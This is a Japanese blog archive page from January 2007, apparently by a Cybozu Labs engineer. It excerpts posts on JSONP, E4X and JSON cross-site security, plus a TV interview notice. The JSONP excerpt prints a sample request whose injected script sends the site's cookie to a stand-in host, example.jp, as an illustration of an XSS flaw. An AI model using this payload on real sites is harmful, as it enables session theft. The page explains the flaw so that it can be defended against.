« 2006年12月 | メイン | 2007年02月 »

2007年01月15日

「スーパー技術者争奪戦」

 ワールドビジネスサテライトの取材が、サイボウズ (本社とラボ?) に入りました。

スーパー技術者争奪戦

デジタル機器の開発に関わる技術者の争奪戦が過熱している。各社ともウィンドウズビズタ発売前に新型パソコンを発表するが、その開発の裏にスーパークリエーターという技術者が。技術者の新たな活用で何か変わるか取材。

www.tv-tokyo.co.jp

 私は、今なにをやっているのかということで Japanize のことや、サイボウズ・ラボで働くことの意味、といったことを話しました。

ちなみに、今夜 (2007/1/15 23:00-) 放送だそうです。電波に乗るといいな。

投稿者 kazuho : 2007年01月15日 11:29 | コメント (1) | トラックバック (2) このエントリーを含むはてなブックマーク このエントリーを含むはてなブックマーク

2007年01月12日

JSONP - データ提供者側のセキュリティについて

 JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。

GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0
Host: example.com

HTTP/1.0 200 OK
Content-Type: text/javascript; charset=utf-8

<script>location='http://example.jp/'+document.cookie</script>({ ... })

 この例の URL を Internet Explorer で直接アクセスすると、クエリ文字列から注入されたスクリプトが実行され、example.com のクッキーが example.jp によって詐取されます。なぜそうなるのでしょう?

続きを読む "JSONP - データ提供者側のセキュリティについて "

投稿者 kazuho : 2007年01月12日 15:05 | コメント (3) | トラックバック (1) このエントリーを含むはてなブックマーク このエントリーを含むはてなブックマーク

2007年01月10日

E4X-XSS 脆弱性について

 Firefox でサポートされている JavaScript 拡張 E4X (ECMA-357) では、JavaScript 内に XML とほぼ同様のマークアップ言語を記述できるようになっています。しかし、マークアップ言語の解釈にはいくつかの違いがあり、この点をついたクロスサイトスクリプティングの可能性が (相当に小さいものの) 存在します。攻撃者は、

  1. ウェブアプリケーションに E4X として解釈した場合に実行コードとして解釈されるコードを注入 (XSS) し、
  2. 1 のコンテンツを <script> タグを用いて参照するような別のウェブサイトを用意し、攻撃対象にアクセスさせる (受動的攻撃)
ことで、秘密情報を詐取することができます。

続きを読む "E4X-XSS 脆弱性について"

投稿者 kazuho : 2007年01月10日 12:37 | トラックバック (1) このエントリーを含むはてなブックマーク このエントリーを含むはてなブックマーク

2007年01月06日

安全な JSON, 危険な JSON (Cross-site Including?)

 先のエントリで、

JSON については、JavaScript として副作用をもたない (もたせようがない) ゆえに文法違反であるがゆえに、秘密情報を含むデータフォーマットとして使用することができるのです。

(Kazuho@Cybozu Labs: クロスサイトのセキュリティモデル)

と書いたのですが、認識が甘かったようです。Jeremiah Grossman: Advanced Web Attack Techniques using GMail によると、配列の初期化演算子 [] の動作を外部から変更することができる注1とのこと。

 実際に手元の Firefox 1.5 で試してみたところ、JSON データが配列として返される場合は、サイトをまたいで参照できるようです。コードは下記のとおり。

続きを読む "安全な JSON, 危険な JSON (Cross-site Including?)"

投稿者 kazuho : 2007年01月06日 10:07 | トラックバック (0) このエントリーを含むはてなブックマーク このエントリーを含むはてなブックマーク

2007年01月04日

クロスサイトのセキュリティモデル

 あけましておめでとうございます。

 昨年、社内で「XMLHttpRequest は何故クロスサイトで使えないのか。画像や SCRIPT タグは使えるのに」という疑問 (というより試問) を耳にしました。おもしろい話なのでブログネタにしようと思っていたのですが、新年早々 GMAIL の事例がスラッシュドットされていたので、自分の現時点での理解をまとめてみることにしました。文書を確認して書いているわけではないので、間違いがあれば指摘してください。また、よい参考文献をご存知の方がいらっしゃいましたら、教えていただければ幸いです。

続きを読む "クロスサイトのセキュリティモデル"

投稿者 kazuho : 2007年01月04日 11:40 | トラックバック (2) このエントリーを含むはてなブックマーク このエントリーを含むはてなブックマーク